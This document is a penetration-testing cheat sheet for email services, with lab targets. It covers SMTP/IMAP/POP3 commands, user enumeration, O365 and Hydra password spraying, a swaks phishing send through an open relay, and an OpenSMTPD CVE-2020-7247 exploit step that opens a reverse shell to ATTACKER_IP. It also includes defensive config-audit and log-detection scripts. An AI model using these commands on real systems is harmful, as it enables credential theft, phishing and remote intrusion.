# Pentesting Email

## SMTP (TCP 25, 587, 465)

### SMTP Commands

| Command    | Description           |
| ---------- | --------------------- |
| AUTH PLAIN | Client authentication |
| HELO       | Start session         |
| MAIL FROM  | Sender address        |
| RCPT TO    | Recipient address     |
| DATA       | Begin email body      |
| RSET       | Abort transmission    |
| VRFY       | Verify mailbox exists |
| EXPN       | Expand mailing list   |
| NOOP       | Keep-alive            |
| QUIT       | End session           |

### Postfix Config

```bash
# Show only active settings: drop comment lines (Postfix comments start with #) and blank lines
grep -v "^#" /etc/postfix/main.cf | sed -r "/^\s*$/d"
```

### Open Relay (Dangerous)

* If `mynetworks` is set to `0.0.0.0/0`, anyone can use the server as a relay

```
mynetworks = 0.0.0.0/0
```

### Telnet SMTP Interaction

```
telnet 10.129.14.128 25
HELO mail1.inlanefreight.htb
EHLO mail1
VRFY root
VRFY cry0l1t3
```

### Send Email via Telnet

```
EHLO inlanefreight.htb
MAIL FROM: <cry0l1t3@inlanefreight.htb>
RCPT TO: <mrb3n@inlanefreight.htb> NOTIFY=success,failure
DATA
From: <cry0l1t3@inlanefreight.htb>
To: <mrb3n@inlanefreight.htb>
Subject: DB
Date: Tue, 28 Sep 2021 16:32:51 +0200

Hey man, I am trying to access our XY-DB but the creds don't work.
Did you make any changes there?
.
QUIT
```

The empty line after the `Date:` header is required: it separates the headers from the body, and a single `.` on its own line terminates the message.

### Nmap SMTP

```bash
sudo nmap 10.129.14.128 -sC -sV -p25
sudo nmap 10.129.14.128 -p25 --script smtp-open-relay -v
```

### SMTP User Enum

```bash
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t [target ip]
```

* `-M` — Sets the mode: EXPN, VRFY, RCPT (default VRFY)
* `-u` — Check if a single user exists
* `-U` — File of usernames to check
* `-t` — Target host running SMTP

```bash
smtp-user-enum -M VRFY -U users.txt -t 10.0.0.1
smtp-user-enum -M EXPN -u admin1 -t 10.0.0.1
smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt
smtp-user-enum -M EXPN -D example.com -U users.txt -t 10.0.0.1
```

***

## IMAP (TCP 143, 993)

### IMAP Commands

| Command                       | Description           |
| ----------------------------- | --------------------- |
| 1 LOGIN username password     | Login                 |
| 1 LIST "" \*                  | List all directories  |
| 1 CREATE "INBOX"              | Create mailbox        |
| 1 DELETE "INBOX"              | Delete mailbox        |
| 1 RENAME "ToRead" "Important" | Rename mailbox        |
| 1 LSUB "" \*                  | List subscribed       |
| 1 SELECT INBOX                | Select mailbox        |
| 1 UNSELECT INBOX              | Exit mailbox          |
| 1 FETCH \<ID> all             | Retrieve message data |
| 1 CLOSE                       | Remove deleted        |
| 1 LOGOUT                      | Close connection      |

### cURL IMAP

```bash
curl -k 'imaps://10.129.14.128' --user user:p4ssw0rd
curl -k 'imaps://10.129.14.128' --user cry0l1t3:1234 -v
```

### OpenSSL Interaction

```bash
openssl s_client -connect 10.129.14.128:pop3s
openssl s_client -connect 10.129.14.128:imaps
```

***

## POP3 (TCP 110, 995)

### POP3 Commands

| Command       | Description               |
| ------------- | ------------------------- |
| USER username | Identify user             |
| PASS password | Authenticate              |
| STAT          | Number of emails          |
| LIST          | List all emails with size |
| RETR id       | Retrieve email by ID      |
| DELE id       | Delete email by ID        |
| CAPA          | Server capabilities       |
| RSET          | Reset                     |
| QUIT          | Close connection          |

### POP3 via Telnet

```
telnet 10.10.10.10 110
USER <username>
PASS <password>
LIST
RETR 1
RETR 2
```

***

## Dovecot Dangerous Settings

| Setting                   | Description                                 |
| ------------------------- | ------------------------------------------- |
| `auth_debug`              | Enable all authentication debug logging     |
| `auth_debug_passwords`    | Log submitted passwords                     |
| `auth_verbose`            | Log failed authentication attempts          |
| `auth_verbose_passwords`  | Log passwords used in failed attempts       |
| `auth_anonymous_username` | Username used for ANONYMOUS SASL logins     |
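The Postfix `mynetworks` open-relay check earlier on this page and the Dovecot settings in this table are all top-level `key = value` checks, so one audit script covers both. The following is an added example, not code from the original page or from the Postfix/Dovecot projects. Both sample configs are constructed; `disable_vrfy_command` is a real Postfix setting (default `no`) included because it controls the VRFY enumeration described elsewhere on this page, and the ANONYMOUS check keys off `auth_mechanisms` because `auth_anonymous_username` only matters when that mechanism is enabled.

```python
"""Audit Postfix and Dovecot settings for the dangerous values this page lists.

Added example (not code from the original cheat sheet).  Both sample configs
below are constructed for the demonstration; read the real files to audit a host.
"""
import ipaddress
import re

# Constructed sample main.cf: relays for the whole Internet and leaves VRFY on
POSTFIX_MAIN_CF = """\
# See /usr/share/postfix/main.cf.dist for a commented, more complete version
myhostname = mail1.inlanefreight.htb
mynetworks = 127.0.0.0/8
    0.0.0.0/0
disable_vrfy_command = no
"""

# Constructed sample dovecot.conf: writes submitted passwords to the log
DOVECOT_CONF = """\
auth_mechanisms = plain login
auth_verbose = yes
auth_debug_passwords = yes
passdb {
  driver = pam
}
"""

KV_RE = re.compile(r"([\w.-]+)\s*=\s*(.*)$")


def parse_kv_config(text):
    """Parse the 'key = value' syntax shared by Postfix main.cf and Dovecot.

    Postfix continues a value on following lines that start with whitespace;
    Dovecot's '{ ... }' blocks are skipped because every setting audited here
    is top-level.
    """
    settings, last_key, depth = {}, None, 0
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("{"):          # Dovecot block start, e.g. 'passdb {'
            depth += 1
            last_key = None
            continue
        if line == "}":
            depth -= 1
            continue
        if depth > 0:
            continue
        if raw[0].isspace() and last_key is not None:   # Postfix continuation line
            settings[last_key] += " " + line
            continue
        m = KV_RE.match(line)
        if m:
            last_key = m.group(1)
            settings[last_key] = m.group(2).strip()
        else:
            last_key = None
    return settings


def audit_postfix(settings):
    """Flag relay and enumeration weaknesses in parsed main.cf settings."""
    findings = []
    for net in settings.get("mynetworks", "").replace(",", " ").split():
        try:
            n = ipaddress.ip_network(net, strict=False)
        except ValueError:
            continue    # hostnames and table lookups (hash:/etc/postfix/...) are not checked
        if n.prefixlen == 0:
            findings.append(f"mynetworks contains {net}: relays mail for everyone (open relay)")
        elif not (n.is_private or n.is_loopback):
            findings.append(f"mynetworks contains public range {net}: verify this is intended")
    # Postfix answers VRFY unless disable_vrfy_command = yes (the default is no)
    if settings.get("disable_vrfy_command", "no").lower() != "yes":
        findings.append("disable_vrfy_command is not 'yes': VRFY user enumeration is possible")
    return findings


# Dovecot settings from the table above; any value other than 'no' enables them
DOVECOT_DANGEROUS = {
    "auth_debug": "all authentication debug logging enabled",
    "auth_debug_passwords": "submitted passwords are written to the log",
    "auth_verbose": "failed authentication attempts are logged verbosely",
    "auth_verbose_passwords": "passwords of failed attempts are logged (plain or sha1)",
}


def audit_dovecot(settings):
    """Flag logging settings that leak credentials, and anonymous SASL."""
    findings = []
    for key, why in DOVECOT_DANGEROUS.items():
        value = settings.get(key, "no").lower()
        if value != "no":
            findings.append(f"{key} = {value}: {why}")
    if "anonymous" in settings.get("auth_mechanisms", "").lower().split():
        user = settings.get("auth_anonymous_username", "anonymous")
        findings.append(f"ANONYMOUS SASL enabled; logins map to user '{user}'")
    return findings


if __name__ == "__main__":
    for name, text, audit in (("postfix", POSTFIX_MAIN_CF, audit_postfix),
                              ("dovecot", DOVECOT_CONF, audit_dovecot)):
        for f in audit(parse_kv_config(text)):
            print(f"[{name}] {f}")
```

Run against the real files with `parse_kv_config(open("/etc/postfix/main.cf").read())`; the loopback range in `mynetworks` is deliberately not reported, since Postfix includes it by default.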

***

## Nmap All Email Protocols

```bash
sudo nmap 10.129.14.128 -sV -p110,143,993,995 -sC
```

***

## Email Port Reference

| Port    | Service                 |
| ------- | ----------------------- |
| TCP/25  | SMTP Unencrypted        |
| TCP/143 | IMAP4 Unencrypted       |
| TCP/110 | POP3 Unencrypted        |
| TCP/465 | SMTP Encrypted          |
| TCP/587 | SMTP Encrypted/STARTTLS |
| TCP/993 | IMAP4 Encrypted         |
| TCP/995 | POP3 Encrypted          |

***

## MX Record Enumeration

```bash
host -t MX hackthebox.eu
host -t MX microsoft.com
dig mx plaintext.do | grep "MX" | grep -v ";"
dig mx inlanefreight.com | grep "MX" | grep -v ";"
```

Resolve the mail server:

```bash
host -t A mail1.inlanefreight.htb.
```

Full Nmap email scan:

```bash
sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 10.129.14.128
```

***

## SMTP User Enumeration (Telnet)

### VRFY

```
telnet 10.10.110.20 25

VRFY root
VRFY www-data
VRFY new-user
```

### EXPN

```
telnet 10.10.110.20 25

EXPN john
EXPN support-team
```

### RCPT TO

```
telnet 10.10.110.20 25

MAIL FROM:test@htb.com
RCPT TO:julio
RCPT TO:kate
RCPT TO:john
```

### POP3 USER Enumeration

```
telnet 10.10.110.20 110

USER julio
USER john
```
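From the server side, the VRFY, EXPN and RCPT TO probes in this section (and the `smtp-user-enum` runs earlier on the page) leave a distinctive trail in the MTA log: a burst of rejected recipients for different, non-existent users from one client, or VRFY/EXPN commands at all. The following detection is an added example, not code from the original page; the log lines are constructed in Postfix's `NOQUEUE: reject:` format for the demonstration, and the alert threshold is an assumed value to tune per environment.

```python
"""Spot VRFY/EXPN/RCPT user enumeration in Postfix smtpd logs.

Added example, not part of the original cheat sheet.  The log lines are
constructed in Postfix's 'NOQUEUE: reject:' style for the demonstration.
"""
import re
from collections import defaultdict

# Constructed sample /var/log/mail.log excerpt: one client walks a wordlist,
# a partner MTA bounces a single typo
SAMPLE_LOG = """\
Sep 28 16:32:51 mail1 postfix/smtpd[2231]: connect from unknown[10.10.14.5]
Sep 28 16:32:52 mail1 postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <julio@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@htb.com> to=<julio@inlanefreight.htb> proto=SMTP helo=<x>
Sep 28 16:32:53 mail1 postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <kate@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@htb.com> to=<kate@inlanefreight.htb> proto=SMTP helo=<x>
Sep 28 16:32:54 mail1 postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <john@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@htb.com> to=<john@inlanefreight.htb> proto=SMTP helo=<x>
Sep 28 16:32:55 mail1 postfix/smtpd[2231]: NOQUEUE: reject: VRFY from unknown[10.10.14.5]: 502 5.5.1 VRFY command is disabled; proto=SMTP helo=<x>
Sep 28 16:40:10 mail1 postfix/smtpd[2240]: NOQUEUE: reject: RCPT from mta.partner.example[203.0.113.7]: 550 5.1.1 <typo@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<alice@partner.example> to=<typo@inlanefreight.htb> proto=ESMTP helo=<mta.partner.example>
"""

REJECT_RE = re.compile(
    r"NOQUEUE: reject: (?P<cmd>RCPT|VRFY|EXPN) from \S+\[(?P<ip>[0-9a-fA-F.:]+)\]: (?P<code>\d{3})"
)
TO_RE = re.compile(r" to=<(?P<to>[^>]*)>")


def detect_enumeration(lines, threshold=3):
    """Return {client_ip: details} for clients that look like they are
    enumerating users: several distinct unknown recipients, or VRFY/EXPN use."""
    per_ip = defaultdict(lambda: {"unknown": set(), "vrfy_expn": 0})
    for line in lines:
        m = REJECT_RE.search(line)
        if not m:
            continue
        stats = per_ip[m.group("ip")]
        if m.group("cmd") in ("VRFY", "EXPN"):
            stats["vrfy_expn"] += 1
        elif "User unknown" in line:
            to = TO_RE.search(line)
            stats["unknown"].add(to.group("to") if to else "?")
    alerts = {}
    for ip, stats in per_ip.items():
        # A single bounce is a typo; a run of distinct unknown users is a wordlist
        if len(stats["unknown"]) + stats["vrfy_expn"] >= threshold:
            alerts[ip] = {"unknown_recipients": sorted(stats["unknown"]),
                          "vrfy_expn": stats["vrfy_expn"]}
    return alerts


if __name__ == "__main__":
    for ip, d in detect_enumeration(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {len(d['unknown_recipients'])} unknown recipients, "
              f"{d['vrfy_expn']} VRFY/EXPN -> likely user enumeration")
```

The partner MTA's single bounce stays below the threshold while the wordlist client is reported; counting distinct recipients rather than raw rejects keeps a retrying legitimate sender from tripping the rule.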

***

## smtp-user-enum

```bash
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7
```

Modes: `-M VRFY`, `-M EXPN`, `-M RCPT`

***

## O365 Enumeration & Spraying

### Validate O365 Domain

```bash
python3 o365spray.py --validate --domain msplaintext.xyz
```

### Enumerate Users

```bash
python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz
```

### Password Spray

```bash
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz
```

***

## Hydra POP3 Password Spray

```bash
hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3
```

***

## Open Relay Exploitation

Detect with Nmap:

```bash
nmap -p25 -Pn --script smtp-open-relay 10.10.11.213
```

Send phishing email via open relay with swaks:

```bash
swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server 10.10.11.213
```

***

## OpenSMTPD RCE (CVE-2020-7247)

* Affects OpenSMTPD up to version 6.6.2
* Unauthenticated RCE via semicolon injection in the sender email address field
* 64-character command limit
* Exploit: <https://www.exploit-db.com/exploits/47984>
* Confirm execution with ICMP before trying for a shell:

```bash
sudo tcpdump -i tun0 icmp
python3 exploit.py HOSTNAME 25 'ping -c 4 ATTACKER_IP'
```

* A valid local recipient may be required for reverse-shell exploit tooling. If accepted by the server, `root@HOSTNAME` can work:

```bash
nc -nlvp 80
python3 exploit.py HOSTNAME 25 'root@HOSTNAME' ATTACKER_IP 80
```

See [OpenSMTPD](/things-i-have-pwnd-before/opensmtpd.md).

***

## Evolution Email Client

```bash
sudo apt-get install evolution
```

GUI client supporting IMAP, SMTP, POP3 — useful for interacting with mailboxes after obtaining credentials.
